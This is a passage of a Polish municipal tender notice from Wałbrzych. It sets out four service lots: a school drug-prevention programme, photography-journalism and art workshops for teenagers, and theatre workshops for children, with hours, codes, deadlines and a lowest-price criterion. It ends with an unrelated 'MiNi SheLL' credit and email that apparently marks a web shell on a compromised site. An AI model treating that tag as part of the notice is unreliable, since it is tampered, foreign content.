<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie i organizacja programu profilaktycznego z zakresu przeciwdziałania narkomanii dla młodzieży, rodziców i nauczycieli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Celem przedmiotowej usługi jest opracowanie i organizacja programu profilaktycznego z zakresu przeciwdziałania narkomanii, dla młodzieży, rodziców i nauczycieli wałbrzyskich szkół gimnazjalnych i ponadgimnazjalnych.
b)	Łączna ilość godzin w  programie winna wynosić 324 godziny zegarowe, z podziałem na każdą placówkę:
-	12 godzin zegarowych - zajęcia dla uczniów,
-	3 godziny zegarowe - zajęcia dla grona pedagogicznego,
-	3 godziny zegarowe - zajęcia dla rodziców.
c)	Programem objęte będą szkoły z terenu Gminy Wałbrzych:
-	10 szkół gimnazjalnych,
-	8 szkół średnich. 
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia.
e)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć
f)	Wykonawca jest zobowiązany do nawiązania współpracy z dyrektorami wszystkich wałbrzyskich szkół gimnazjalnych i ponadgimnazjalnych, ustalenia szczegółowego harmonogramu szkoleń i planu pracy. Wykonawca przedstawi przedmiotowy plan pracy Zamawiającemu przed rozpoczęciem wykonywania usługi.    
g)	Miejsce: usługa będzie realizowana w siedzibach wałbrzyskich szkół gimnazjalnych i ponadgimnazjalnych.
h)	Zajęcia kierowane do uczniów powinny uwzględniać w swej tematyce zagadnienia związane z profilaktyką uzależnień od narkotyków, w tym: edukację z zakresu uzależnień i szkód związanych z uzależnieniem, dostarczenie wiedzy na temat skutecznych i bezpiecznych form pomocy dla osób mających problem z używaniem i uzależnieniem od środków odurzających, naukę radzenia sobie z problemami przy wykorzystaniu własnych zasobów.
i)	Zajęcia kierowane do nauczycieli i rodziców powinny uwzględniać w swej tematyce edukację z zakresu uzależnień, sposobów interweniowania wobec osoby uzależnionej i sięgającej po środki psychoaktywne, naukę rozpoznawania sygnałów świadczących o zażywaniu substancji psychoaktywnych i sposobów interwencji wobec takiej osoby, zwiększenie świadomości dotyczącej zjawiska uzależnień wśród młodzieży. 
j)	Wykonawca będzie zobowiązany do dostarczenia listy z podpisami uczestników szkolenia oraz wykaz przepracowanych godzin, potwierdzonych przez dyrektora danej placówki oświatowej. Ponadto Wykonawca raz w miesiącu przygotuje sprawozdanie z wykonanego zadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.52.10.00-2, 85.00.00.00-9, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie warsztatów fotograficzno - dziennikarskich dla Klubu Młodzieżowego w ramach Projektu Centrum Aktywności Lokalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Grupa docelowa - około 12 osób - młodzież w wieku od 13 lat.
b)	Całkowity czas trwania - 50 h (zajęcia będą odbywały się 2 razy w tygodniu po 3 h, przy czym ostatnie zajęcia będą trwać 2 h), w  podziale:
-	40 h - zajęcia praktyczne - zajęcia fotograficzne plenerowe, połączone z wycieczkami po wałbrzyskim Śródmieściu,
-	10 h - zajęcia teoretyczne - dotyczące fotografii i dziennikarstwa.
c)	Miejsce zajęć - Centrum Aktywności Lokalnej, ul. Mickiewicza 26, 58 - 300 Wałbrzych oraz zajęcia plenerowe na terenie wałbrzyskiego Śródmieścia.
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia. 
e)	Cel - podstawowym celem jest rozwijanie zainteresowań, podniesienie motywacji do działania. Podczas warsztatów beneficjenci będą mieli okazję poznać od strony teoretycznej i praktycznej sztukę fotografii. Warsztaty mają na celu zainteresowanie młodzieży różnymi formami spędzania wolnego czasu, pobudzenie do samorozwoju, poszukiwania własnych talentów i pasji, pomoc w rozwijaniu i pobudzaniu wrażliwości oraz zachęcanie do własnych dziennikarskich i fotograficznych poszukiwań. 
f)	Główne założenia - rozwijanie twórczego myślenia, wrażliwości i wyobraźni, dostarczanie emocji, wzbogacanie przeżyć, wzrost pewności siebie, umiejętność współpracy w grupie oraz integracja. 
g)	Tematyka - fotografia cyfrowa i analogowa, techniki fotografowania, podstawy komputerowej obróbki obrazu, kompozycja obrazów - samodzielna fotografia, wykonywanie zdjęć różnymi technikami. Podczas zajęć beneficjenci nauczą się podstawowych technik fotografii i zdobędą podstawy warsztatu dziennikarskiego. Jednym z tematów zajęć winna być fotografia portretowa. Beneficjenci wcielą się wówczas zarówno w fotografów jaki i modeli, poznając w ten sposób fotografowanie z obu stron. Kolejnym tematem zajęć winna być rewitalizacja wałbrzyskiego Śródmieścia, widziana oczami młodych. Beneficjenci winni fotografować i opisywać zmiany w Śródmieściu.      
h)	Po zakończeniu zajęć, Wykonawca przygotuje albumy ze zdjęciami wykonanymi w trakcie zajęć. Albumy w ilości 13 szt. dla zamawiającego oraz 1 szt. dla każdego z beneficjentów, powinny zawierać minimum 30 zdjęć formatu 10x15 cm. Dodatkowo Wykonawca zapewni 10 zdjęć formatu 15x21 cm oprawionych w ramki.     
i)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć, m. in. aparaty cyfrowe dla każdego beneficjenta (na czas trwania zajęć).
j)	Wykonawca wykona i wyda certyfikaty potwierdzające ukończenie warsztatów pn. Warsztaty fotograficzno - dziennikarskie - zawierające zestawienie wszystkich działań zawartych w przedmiocie zamówienia (na odwrocie certyfikatu w formie tabelarycznej), z wyszczególnieniem informacji odnośnie ilości godzin teoretycznych i praktycznych, z odpowiednim oznakowaniem promocyjnym uwzględniającym Wytyczne dotyczące oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki z 4 lutego 2009 r. oraz Strategię Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007-2013 wraz z załącznikiem Nr 1, a także Wytycznymi w zakresie informacji i promocji, wydany przez Wykonawcę. Wykonawca zobowiązany będzie do przekazania Zamawiającemu na 14 dni przed zakończeniem warsztatów, wzoru w/w certyfikatu (z odpowiednim oznakowaniem unijnym) potwierdzającego ukończenie przez uczestnika projektu warsztatów pn.: Warsztaty fotograficzno - dziennikarskie (w pliku PDF). Powyższy dokument musi być zgodny z wymogami wynikającymi z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z   4 lutego 2009 r. Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007 - 2013 wraz z załącznikiem Nr 1 oraz Wytycznych w zakresie informacji i promocji. Po akceptacji przez Zamawiającego ww wzoru w pliku PDF, Wykonawca bezzwłocznie winien (przed wydaniem ostatecznego dokumentu) przedłożyć jeden wypełniony, papierowy egzemplarz Zamawiającemu, celem jego ostatecznej akceptacji, co będzie warunkować wydanie ww dokumentu uczestnikom warsztatów.
k)	Zamawiający przygotuje szczegółowy harmonogram zajęć, najpóźniej do dnia podpisania umowy oraz będzie prowadził listy obecności..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie warsztatów plastycznych z elementami projektowania wnętrz dla Klubu Młodzieżowego w ramach Projektu Centrum Aktywności Lokalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Grupa docelowa - około 12 osób - młodzież w wieku od 13 lat.
b)	Całkowity czas trwania - 50 h (zajęcia będą odbywały się 2 razy w tygodniu po 3 h, przy czym ostatnie zajęcia będą trwać 2 h)
c)	Miejsce zajęć - Centrum Aktywności Lokalnej, ul. Mickiewicza 26, 58 - 300 Wałbrzych oraz zajęcia plenerowe na terenie wałbrzyskiego Śródmieścia.
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia.
e)	Cel - podstawowym celem jest rozwijanie zainteresowań, podniesienie motywacji do działania. Warsztaty mają na celu zainteresowanie młodzieży różnymi formami spędzania wolnego czasu, pobudzenie do samorozwoju, poszukiwania własnych talentów i pasji, pomoc w rozwijaniu i pobudzaniu wrażliwości. 
f)	Główne założenia - rozwijanie twórczego myślenia, wrażliwości i wyobraźni, dostarczanie emocji, wzbogacanie przeżyć, wzrost pewności siebie, umiejętność współpracy w grupie oraz integracja. 
g)	Tematyka - wiedza z zakresu malarstwa, rysunku i grafiki, praktyczne poznanie technik i technologii wykorzystywanych w twórczości plastycznej: rysunek ołówkiem, węglem, sepią, malarstwo akwarelowe, temperowe, akrylowe i olejne, grafika warsztatowa - wypukło druki - gipsoryt i linoryt. Tematyka prac to tematy studyjne martwa natura, pejzaż i postać oraz dowolne tematy wybrane przez uczestników. W trakcie warsztatów prowadzone będą również indywidualne korekty prac. Design we wnętrzu, kolory we wnętrzu (barwa, kontrast barw), oświetlenie we wnętrzu, elementy materiałoznawstwa, styl, charakter wnętrza, łącznie stylów we wnętrzu. 
h)	Na zakończenie zajęć Wykonawca zorganizuje wystawę prac powstałych podczas warsztatów w Centrum Aktywności Lokalnej.  
i)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć.
j)	Wykonawca wykona i wyda certyfikaty potwierdzające ukończenie warsztatów pn. Warsztaty plastyczne z elementami projektowania wnętrz - zawierające zestawienie wszystkich działań zawartych w przedmiocie zamówienia (na odwrocie certyfikatu w formie tabelarycznej), z wyszczególnieniem informacji odnośnie ilości godzin teoretycznych i praktycznych, z odpowiednim oznakowaniem promocyjnym uwzględniającym Wytyczne dotyczące oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki z 4 lutego 2009 r. oraz Strategię Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007-2013 wraz z załącznikiem Nr 1, a także Wytycznymi w zakresie informacji i promocji, wydany przez Wykonawcę. Wykonawca zobowiązany będzie do przekazania Zamawiającemu na 14 dni przed zakończeniem warsztatów, wzoru ww certyfikatu (z odpowiednim oznakowaniem unijnym) potwierdzającego ukończenie przez uczestnika projektu warsztatów pn.: Warsztaty plastyczne z elementami projektowania wnętrz (w pliku PDF). Powyższy dokument musi być zgodny z wymogami wynikającymi z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z 4 lutego 2009 r., Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007 - 2013 wraz z załącznikiem Nr 1 oraz Wytycznych w zakresie informacji i promocji. Po akceptacji przez Zamawiającego ww wzoru w pliku PDF, Wykonawca bezzwłocznie winien (przed wydaniem ostatecznego dokumentu) przedłożyć jeden wypełniony, papierowy egzemplarz Zamawiającemu, celem jego ostatecznej akceptacji, co będzie warunkować wydanie ww dokumentu uczestnikom warsztatów.
k)	Zamawiający przygotuje szczegółowy harmonogram zajęć oraz będzie prowadził listy obecności..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prowadzenie warsztatów teatralnych dla Świetlicy Środowiskowej Śródmieście.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Grupa docelowa - około 20 - 25 dzieci w grupie wiekowej 6 - 12 lat.
b)	Całkowity czas trwania - 12 h (zgodnie z harmonogramem, o którym mowa w pkt 3.4 lit.j) 
c)	Miejsce zajęć - teatr na terenie Wałbrzycha.
d)	Osoba prowadząca - Wykonawca zapewni wykwalifikowaną kadrę osób posiadających stosowne  uprawnienia i kwalifikacje, zdolnych do wykonania przedmiotu zamówienia
e)	Wykonawca zapewni wszelki niezbędny sprzęt i materiały do przeprowadzenia zajęć
f)	Tematyka i założenia - zwiększenie wiedzy o teatrze, scenografii, muzyce teatralnej, technikach scenicznych, poznawanie teatru poprzez zabawę. Zajęcia winny być prowadzone na terenie teatru, w pracowniach artystycznych, na scenie, prowadzone pod kierunkiem reżysera lub aktora. Zajęcia powinny obejmować przygotowanie inscenizacji wybranego utworu, następnie zachowując wszelkie stadia produkcji spektaklu teatralnego, w tym opracowanie tekstu z podziałem na role, projektowanie i wykonanie scenografii, wybór muzyki i piosenek, ustawienie świateł, opracowanie warsztatu aktorskiego, projektowanie plakatu, programu, zaproszenia itd. 
g)	Na zakończenie warsztatów Wykonawca wraz z beneficjentmi przygotuje na scenie teatru inscenizację, dla zaproszonej przez beneficjentów publiczności.
h)	Wykonawca przygotowuje certyfikat ukończenia zajęć.
i)	W ramach usługi Wykonawca zapewni transport dla beneficjentów i dwóch opiekunów na trasie z Centrum Aktywności Lokalnej przy ul. Mickiewicza 26 do swojej siedziby i z powrotem, bądź zapewni refundację kosztów dojazdu w postaci biletów komunikacji miejskiej.
j)	Zamawiający przygotuje harmonogram zajęć w terminie do dnia podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com